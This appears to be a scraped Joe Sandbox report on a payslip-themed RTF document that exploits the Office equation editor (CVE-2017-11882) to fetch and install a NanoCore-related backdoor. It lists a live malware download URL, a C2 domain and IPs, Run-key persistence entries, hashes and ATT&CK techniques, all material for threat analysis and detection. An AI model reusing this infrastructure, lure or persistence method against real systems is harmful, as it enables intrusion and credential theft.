tEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: jqenyeo.exe, 00000007.00000002.1177296193.0000000001ED2000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: Yara matchFile source: 7.2.jqenyeo.exe.414058.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.0.jqenyeo.exe.400000.5.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.4ae4629.12.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.0.jqenyeo.exe.400000.8.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.32f4415.8.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.0.jqenyeo.exe.400000.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.5fb140.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.550000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.550000.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.5fb140.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.0.jqenyeo.exe.400000.10.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.jqenyeo.exe.330000.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.jqenyeo.exe.330000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.32efdec.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.4ae0000.11.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.jqenyeo.exe.341658.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.32efdec.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.414058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.1ed0000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.jqenyeo.exe.341658.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.32eafb6.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.0.jqenyeo.exe.400000.9.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.0.jqenyeo.exe.400000.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.4ae0000.11.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.jqenyeo.exe.400000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000007.00000002.1177072990.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000000.925605410.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.1177611685.00000000032E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000000.924356311.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.1177965597.0000000004AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.930427801.0000000000330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.1177133041.0000000000550000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.1177349717.0000000002271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.1177195760.00000000005ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.1177296193.0000000001ED2000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: jqenyeo.exe PID: 808, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: jqenyeo.exe PID: 324, type: MEMORYSTR
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 7_2_043B257A bind,
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 7_2_043B2528 bind,
      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts11
      Native API
      1
      Registry Run Keys / Startup Folder
      1
      Access Token Manipulation
      1
      Disable or Modify Tools
      11
      Input Capture
      1
      System Time Discovery
      Remote Services11
      Archive Collected Data
      Exfiltration Over Other Network Medium12
      Ingress Tool Transfer
      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
      System Shutdown/Reboot
      Default Accounts23
      Exploitation for Client Execution
      Boot or Logon Initialization Scripts112
      Process Injection
      1
      Deobfuscate/Decode Files or Information
      LSASS Memory2
      File and Directory Discovery
      Remote Desktop Protocol11
      Input Capture
      Exfiltration Over Bluetooth1
      Encrypted Channel
      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)1
      Registry Run Keys / Startup Folder
      1
      Obfuscated Files or Information
      Security Account Manager17
      System Information Discovery
      SMB/Windows Admin Shares1
      Clipboard Data
      Automated Exfiltration1
      Non-Standard Port
      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
      Software Packing
      NTDS141
      Security Software Discovery
      Distributed Component Object ModelInput CaptureScheduled Transfer1
      Remote Access Software
      SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
      Masquerading
      LSA Secrets2
      Process Discovery
      SSHKeyloggingData Transfer Size Limits2
      Non-Application Layer Protocol
      Manipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.common31
      Virtualization/Sandbox Evasion
      Cached Domain Credentials31
      Virtualization/Sandbox Evasion
      VNCGUI Input CaptureExfiltration Over C2 Channel222
      Application Layer Protocol
      Jamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup Items1
      Access Token Manipulation
      DCSync1
      Application Window Discovery
      Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job112
      Process Injection
      Proc Filesystem1
      Remote System Discovery
      Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
      Hidden Files and Directories
      /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 627852 Sample: Payslip_APR_2022.doc Startdate: 16/05/2022 Architecture: WINDOWS Score: 100 46 Initial sample is an obfuscated RTF file 2->46 48 Snort IDS alert for network traffic 2->48 50 Multi AV Scanner detection for domain / URL 2->50 52 17 other signatures 2->52 8 EQNEDT32.EXE 11 2->8         started        13 ltqmdmdi.exe 2->13         started        15 WINWORD.EXE 291 19 2->15         started        process3 dnsIp4 42 lutanedukasi.co.id 43.245.183.172, 49171, 80 INFINYS-AS-IDPTInfinysSystemIndonesiaID Indonesia 8->42 34 C:\Users\user\AppData\Roaming\dll.exe, PE32 8->34 dropped 36 C:\Users\user\AppData\Local\...\jnstp[1].exe, PE32 8->36 dropped 64 Office equation editor establishes network connection 8->64 66 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 8->66 17 dll.exe 19 8->17         started        68 Multi AV Scanner detection for dropped file 13->68 38 ~WRF{E418C216-F903...5-89DE9868688C}.tmp, Composite 15->38 dropped file5 signatures6 process7 file8 30 C:\Users\user\AppData\Local\...\jqenyeo.exe, PE32 17->30 dropped 54 Multi AV Scanner detection for dropped file 17->54 56 Machine Learning detection for dropped file 17->56 21 jqenyeo.exe 1 2 17->21         started        signatures9 process10 file11 32 C:\Users\user\AppData\...\ltqmdmdi.exe, PE32 21->32 dropped 58 Multi AV Scanner detection for dropped file 21->58 60 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 21->60 62 Injects a PE file into a foreign processes 21->62 25 jqenyeo.exe 6 21->25         started        signatures12 process13 dnsIp14 44 stonecold.ddns.net 45.132.226.1, 2702 SOFTLAYERUS Netherlands 25->44 40 C:\Users\user\AppData\Roaming\...\run.dat, ISO-8859 25->40 dropped 70 Hides that the sample has been downloaded from the Internet (zone.identifier) 25->70 file15 signatures16

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      Payslip_APR_2022.doc34%VirustotalBrowse
      Payslip_APR_2022.doc24%ReversingLabsDocument-RTF.Exploit.Heuristic
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{E418C216-F903-4F08-9D65-89DE9868688C}.tmp100%AviraEXP/CVE-2017-11882.Gen
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\jnstp[1].exe100%Joe Sandbox ML
      C:\Users\user\AppData\Roaming\dll.exe100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{E418C216-F903-4F08-9D65-89DE9868688C}.tmp100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\jnstp[1].exe54%ReversingLabsWin32.Backdoor.NanoBot
      C:\Users\user\AppData\Local\Temp\jqenyeo.exe23%ReversingLabsWin32.Trojan.Pwsx
      C:\Users\user\AppData\Roaming\dll.exe54%ReversingLabsWin32.Backdoor.NanoBot
      C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe23%ReversingLabsWin32.Trojan.Pwsx
      SourceDetectionScannerLabelLinkDownload
      7.2.jqenyeo.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      7.0.jqenyeo.exe.400000.5.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      7.0.jqenyeo.exe.400000.8.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      8.2.ltqmdmdi.exe.400000.0.unpack100%AviraTR/Crypt.EPACK.Gen2Download File
      7.0.jqenyeo.exe.400000.7.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      7.0.jqenyeo.exe.400000.10.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      7.2.jqenyeo.exe.4ae0000.11.unpack100%AviraTR/NanoCore.fadteDownload File
      5.2.jqenyeo.exe.400000.3.unpack100%AviraTR/Crypt.EPACK.Gen2Download File
      7.2.jqenyeo.exe.1ed0000.4.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      2.3.EQNEDT32.EXE.346c28.0.unpack100%AviraTR/Patched.Ren.GenDownload File
      7.0.jqenyeo.exe.400000.9.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      7.0.jqenyeo.exe.400000.6.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      2.3.EQNEDT32.EXE.346c28.1.unpack100%AviraTR/Patched.Ren.GenDownload File
      SourceDetectionScannerLabelLink
      lutanedukasi.co.id12%VirustotalBrowse
      SourceDetectionScannerLabelLink
      http://lutanedukasi.co.id/wp-includes/jnstp.exej100%Avira URL Cloudmalware
      http://lutanedukasi.co.id/wp-includes/jnstp.exe13%VirustotalBrowse
      http://lutanedukasi.co.id/wp-includes/jnstp.exe100%Avira URL Cloudmalware
      http://lutanedukasi.co.id/wp-includes/jnstp.exejjC:100%Avira URL Cloudmalware
      http://lutanedukasi.co.id/wp-includes/jnstp.exeC:100%Avira URL Cloudmalware
      http://lutanedukasi.co.id/wp-includes/jnstp.exeT100%Avira URL Cloudmalware
      stonecold.ddns.net0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      lutanedukasi.co.id
      43.245.183.172
      truetrueunknown
      stonecold.ddns.net
      45.132.226.1
      truetrue
        unknown
        NameMaliciousAntivirus DetectionReputation
        http://lutanedukasi.co.id/wp-includes/jnstp.exetrue
        • 13%, Virustotal, Browse
        • Avira URL Cloud: malware
        unknown
        stonecold.ddns.nettrue
        • Avira URL Cloud: safe
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://lutanedukasi.co.id/wp-includes/jnstp.exejEQNEDT32.EXE, 00000002.00000002.911909348.00000000002CF000.00000004.00000020.00020000.00000000.sdmptrue
        • Avira URL Cloud: malware
        unknown
        http://lutanedukasi.co.id/wp-includes/jnstp.exejjC:EQNEDT32.EXE, 00000002.00000002.911909348.00000000002CF000.00000004.00000020.00020000.00000000.sdmptrue
        • Avira URL Cloud: malware
        unknown
        http://lutanedukasi.co.id/wp-includes/jnstp.exeC:EQNEDT32.EXE, 00000002.00000003.909460483.0000000000342000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.909424895.0000000000334000.00000004.00000020.00020000.00000000.sdmptrue
        • Avira URL Cloud: malware
        unknown
        http://nsis.sf.net/NSIS_ErrorErrorEQNEDT32.EXE, 00000002.00000003.909271531.000000000036D000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000004.00000002.932811810.000000000040A000.00000004.00000001.01000000.00000004.sdmp, dll.exe, 00000004.00000000.911118896.000000000040A000.00000008.00000001.01000000.00000004.sdmp, jnstp[1].exe.2.dr, dll.exe.2.drfalse
          high
          http://lutanedukasi.co.id/wp-includes/jnstp.exeTEQNEDT32.EXE, 00000002.00000003.899513606.00000000002F4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.912071092.000000000030E000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: malware
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          45.132.226.1
          stonecold.ddns.netNetherlands
          36351SOFTLAYERUStrue
          43.245.183.172
          lutanedukasi.co.idIndonesia
          58397INFINYS-AS-IDPTInfinysSystemIndonesiaIDtrue
          Joe Sandbox Version:34.0.0 Boulder Opal
          Analysis ID:627852
          Start date and time: 16/05/202222:06:172022-05-16 22:06:17 +02:00
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 7m 44s
          Hypervisor based Inspection enabled:false
          Report type:light
          Sample file name:Payslip_APR_2022.doc
          Cookbook file name:defaultwindowsofficecookbook.jbs
          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
          Number of analysed new started processes analysed:12
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal100.troj.expl.evad.winDOC@9/15@8/2
          EGA Information:
          • Successful, ratio: 80%
          HDC Information:
          • Successful, ratio: 61.2% (good quality ratio 57%)
          • Quality average: 81%
          • Quality standard deviation: 29.3%
          HCA Information:
          • Successful, ratio: 99%
          • Number of executed functions: 0
          • Number of non-executed functions: 0
          Cookbook Comments:
          • Found application associated with file extension: .doc
          • Adjust boot time
          • Enable AMSI
          • Found Word or Excel or PowerPoint or XPS Viewer
          • Found warning dialog
          • Click Ok
          • Attach to Office via COM
          • Scroll down
          • Close Viewer
          • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, conhost.exe, svchost.exe
          • TCP Packets have been reduced to 100
          • Execution Graph export aborted for target EQNEDT32.EXE, PID 2868 because there are no executed function
          • Not all processes where analyzed, report is missing behavior information
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryAttributesFile calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          TimeTypeDescription
          22:07:16API Interceptor115x Sleep call for process: EQNEDT32.EXE modified
          22:07:27AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run wboyuqknqhxiar C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe
          22:07:33API Interceptor1697x Sleep call for process: jqenyeo.exe modified
          22:07:35AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run wboyuqknqhxiar C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe
          No context
          No context
          No context
          No context
          No context
          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
          Category:downloaded
          Size (bytes):328454
          Entropy (8bit):7.939038375304377
          Encrypted:false
          SSDEEP:6144:ZYa6V3+v+HtdlL29jQwnq/c3Ffiy6d2W6zzHIn6pf43lYnkBItVb2slFQ6/gM:ZYD3+v2tP2Vnnq/4iy6wWazHM6FCmbtV
          MD5:F32D1F6E94DA654932E73E42F0F4773A
          SHA1:04E51BB4DEDFC85CB6D4DFCEB3BF48BF69C2A58A
          SHA-256:43F670B439EF8EA9765EF3A61E84F1997E3DFD30067DC11C3203CAF258553398
          SHA-512:654F6732AB95AAD2A8392A4359501D1758023676697C17928A891E1CE02298D93C795BE59B683F0961B2B7C15FB4C498747BD03F90FDAEFC1ED0CAA900AD37AD
          Malicious:true
          Antivirus:
          • Antivirus: Joe Sandbox ML, Detection: 100%
          • Antivirus: ReversingLabs, Detection: 54%
          Reputation:low
          IE Cache URL:http://lutanedukasi.co.id/wp-includes/jnstp.exe
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*......@6............@.......................................@.............................................P............................................................................................................text...vf.......h.................. ..`.rdata...............l..............@..@.data...x...........................@....ndata...................................rsrc...P...........................@..@................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          File Type:Composite Document File V2 Document, Cannot read section info
          Category:dropped
          Size (bytes):5632
          Entropy (8bit):4.137255025897595
          Encrypted:false
          SSDEEP:48:rXt8UnfMPj+sBZncff1vYMEM49YKQ65AhEKUFpVSj0iF:zt88fMPjjeffNER26uuKUFpAjpF
          MD5:550C03674C1B3B89BFA7C6B1873D0534
          SHA1:F90F742617EEF24875CC3993A285DEF27DC07A78
          SHA-256:A1EAFE2749F642ADE617EC03AF6ED56543C30E7040FCCB2E8487E3046766DF6E
          SHA-512:76E9BAA6E5469487A9108AF0C0B20852451A587CE97375A0D66F2B147806828C61B84B8403E59039B5BA45D1F95FD0E15A4304B7EB5946FF45E9DDC8767C2596
          Malicious:true
          Antivirus:
          • Antivirus: Avira, Detection: 100%
          • Antivirus: Joe Sandbox ML, Detection: 100%
          Reputation:low
          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          File Type:data
          Category:dropped
          Size (bytes):1024
          Entropy (8bit):0.05390218305374581
          Encrypted:false
          SSDEEP:3:ol3lYdn:4Wn
          MD5:5D4D94EE7E06BBB0AF9584119797B23A
          SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
          SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
          SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
          Malicious:false
          Reputation:high, very likely benign file
          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          File Type:data
          Category:dropped
          Size (bytes):1212
          Entropy (8bit):2.37081106128136
          Encrypted:false
          SSDEEP:12:20SJc6KLMFbM06ldG+WmH+W6VFkyuvq2ZGDzqweVOZ5IsGc1k5uFh:GJFxV63446VFfunSzqwaOZ2sGcC50h
          MD5:2F87273F73CB9923F2348F74D383CEC0
          SHA1:4A283D4C944ADE6640EE320DB98026BFD7622D48
          SHA-256:1C0D34317A8CEF4136D4D5B4F31955C226D70891CE0EE429BF51E6E5CB3BA3FD
          SHA-512:0BEB3FB9A3FDC3DD79278A1B3DF6550FBEA3571CF8006D97B4DAFEFA2BA06B5E8685179077D301648E1794F6600F052402E730F7D1AD26A5ADB72C6B19D23C3B
          Malicious:false
          Reputation:low
          Preview: . . . . . . . . . . . . . . . .9.8.7.1.0.8.8.5. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .i.5.n.6.9.Y.I.D.C.S.n.J.J.9.o.D.3.o.O.3.7.B.r.7.f.a.o.2.t.E.E.8.s.e.y.4.g.Y.X.m.c.n.u.Y._.6.X.O.U.g.E.B.p.l.0.6.T.v.b.M.n.m.k.2.j.Q.i.d.j.E.x.2.E.q.9.f.4.S.G.n.R.H.A.G.w.P.A.. . . . . .9.1.9.5.6.7.7.5.8.9.1.9.5.6.7.7.5.8.. ..........................................................................................................h...j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................j....CJ..OJ..QJ..U..^J..aJ
          Process:C:\Users\user\AppData\Roaming\dll.exe
          File Type:data
          Category:dropped
          Size (bytes):7218
          Entropy (8bit):6.09068537307505
          Encrypted:false
          SSDEEP:192:NKZQlWjKlEs8sD3PyyS+B7G+H+h+iCykXh5SfHooOFK3/gWW+W2/pNAy/n5S:tLNld4fHo9Q47+W2HBS
          MD5:D4817E78989E590672F8031004C88864
          SHA1:299E84F2A32FA57AD733B4D8B3B680D5D339A623
          SHA-256:DF44088E83EB3E242467C34BC190C25E05F3CF1B9C5B1B7B368F35E7CCFBD4FB
          SHA-512:82463291532613DA4CA62703A68A68C2F402D89872106857B3914A13965E4BE0CAED8C713DDC8B478387661BC5AC5C035232B50CBAEA72403DDBF05951587943
          Malicious:false
          Reputation:low
          Preview:.y...*D....,7(.Z...(.'.l:..(.'.l:..Z..:.e....Z...J..J.B:......F:.F*..J..J.B:......F:.F*..J..J.B:......F:.F*..J..J.B:......F:.F*..R.yW.#.5$.||:..F:.F*.D:...y..F:.F..D:.D..By...#.6.D:.|*.By.F:.(7FZ...#.......y.z.dZ..J.6.J.3.J..5.J..6.J.0.J.?..I.X.D..X.F..}...J..J..3D:..zF:.|Z.....9.y.....y...DZ.?0D:.0?4....*D....(.'.l:.D:.D.:.L}D:.D.D..Di.D9.yF*.F:.D:.D.D..F.D:.D*.....%w..P.K{..%{..i.%'.P.={..7{....%.1.P..{..9{....*D...e.(.'.l:..:.....B:.F:..R..IwD:....D:.F:.D:.F:...z....I.D:..#.6$..F9.F).B:..#.6...F9.F).#{#.5$..B9z..%'.P..........F:..B:...J.....F:..R..I..Z..x.:.....D:...y.*D.....(.'.l:..:.e...B:.F:..R..IwD:....D:.F:.D:.F:...y......C...D:..#.6$..F9..F).D:..#.6...F9..F).D:..#.6..F9..F).D:i..#.3$.|F9j.F.j.B:..#.6..{F9..F).#z#.5$..B9z..%w..P..........F:..Ru.I.D:.D.uF.h.Ju.Ji.J..J..J.....F:..R..I..Z..x.:.....D:...i.*D...q.:.....B:.F:..R..IwD:....D:.F:.D:.F:...|....I.D:..#.6$..F9..F).D:..#.6...F9..F).#{#.5$..B9z.%.1.P......a...F:...J..J....
          Process:C:\Users\user\AppData\Roaming\dll.exe
          File Type:PE32 executable (console) Intel 80386, for MS Windows
          Category:dropped
          Size (bytes):75776
          Entropy (8bit):6.193270446965403
          Encrypted:false
          SSDEEP:1536:GkUaNhhJfoI4yRkSzwxUWHQzdYgaeTcczegsWjcdOF:GWhzfOSzAezdnzMOF
          MD5:22A5EC1E72CE0D23B1598C40639BB3B2
          SHA1:44E54FBE0B56A243CFDC3BA01EC0B5D7D0252BAE
          SHA-256:525DD105980B23F780D5E9A747FF3D1BC09DD41FBFDD4266B64F1BDD6D632CFF
          SHA-512:1530704DBD2CEC6D811253FEF12995AD3BF739F1659F3C7634824EF412FB84592E33D751D1403C712FFB4BF034FFA7EF8C309C988241C92BB5D2445532653443
          Malicious:true
          Antivirus:
          • Antivirus: ReversingLabs, Detection: 23%
          Reputation:low
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......cZ..';..';..';..*ik.?;..*iU.(;..*ij.U;...C..>;..';...;....j.&;....T.&;..Rich';..........................PE..L......b..........................................@..........................p...............................................!..........................................................................@............................................text...F........................... ..`.rdata...L.......N..................@..@.data...,1...0......................@...................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Users\user\AppData\Roaming\dll.exe
          File Type:data
          Category:dropped
          Size (bytes):279039
          Entropy (8bit):7.985547118986311
          Encrypted:false
          SSDEEP:6144:mE5rmm6/VUtpaEhhjj8c7pcERJmK7YeyuHa7fCwaE+37TR2+sOrKqy6K4qVJovjN:mEfZ/aEh9jtpNRJmwYJUjwaESA+HrKOn
          MD5:571129812363BF5751369230EDF0A747
          SHA1:D5EEDA388C78A4479453D70F2833969E712E2C5B
          SHA-256:B0ED7C04CF56F147615C69DA29D35A8D7F795F208B7DC15C66063188A26DEEF6
          SHA-512:3717BFD28789A53886141A1B9656F7FBAC25B666CCD3B6356D6A8C84EBF5CCE057C8BF95C664DFDF2F9DB8C3684BF95D6397BB8241A81A1F55A71A001412C1C7
          Malicious:false
          Reputation:low
          Preview:..?....s....P+.e..QI.b...5....H..._..x.M.#.l.S...t.#..$.!....d\.....[...0...$...YT...E....._I......Aw...#....A.:.....m..0..e*.N=.p....Z.Qx^.\~...%.q.. .<qF3...o...N.`*/.hE1.......?AJ+...SvC)P..$..|.POY..z.....]..`{...c!.T..d..a......8.W.t...G.._J..JC..z+.j..QW...F/...H.*._..xs4.#...S...t.#m.$.!..I.d.xy..6.L.....dt.DC.K.,|.ph....+..$....[....`G.c.^....s...m..0.....).I..:-T..^.G....9\.q..^.$D....%..Y.gw...D.9..g.Wc.d.....=.U_.p..0... .I.~..F.8.4..C.!i.I.|..)..:.P..s........Y.......t.NYG..\........+.j..QI.b...5....N..:....x.{.#.@.S.>.t....$.!..i.d.x..6.P..Udt....K.B..p..L..#..9....[....4G.C.c...s.".m.. .W3p..8^..>.T>.n.G.....\.q..^.$D....%...,g...D.9..g.Wc.d.....=.U_.p.m.... .I.~..F.8.4*.C..i.I.|..)..:.P..s........Y..8.W.t...G.........z+.j..QI.b...5....H..._..x.M.#.l.S...t.#..$.!..i.d.x.6.L..E..dt.D..K..|.ph.L..#..9....[....4G.c.^...s...m..0.W....I..>.T>.n.G....9\.q..^.$D....%...,g...D.9..g.Wc.d.....=.U_.p.m.... .I.~..F.8.4*.C..i.I.|..)..
          Process:C:\Users\user\AppData\Roaming\dll.exe
          File Type:data
          Category:dropped
          Size (bytes):371399
          Entropy (8bit):7.74164846031575
          Encrypted:false
          SSDEEP:6144:CE5rmm6/VUtpaEhhjj8c7pcERJmK7YeyuHa7fCwaE+37TR2+sOrKqy6K4qVJovjg:CEfZ/aEh9jtpNRJmwYJUjwaESA+HrKOm
          MD5:5A68D6B8A8885F9D66B5FB1AC997AD05
          SHA1:1464557BEE7B00E85E4B0C23E626422FFB5C9677
          SHA-256:024571C42A870740BA742BE308E10C4DA75AEF4E801D77E0792827D423583836
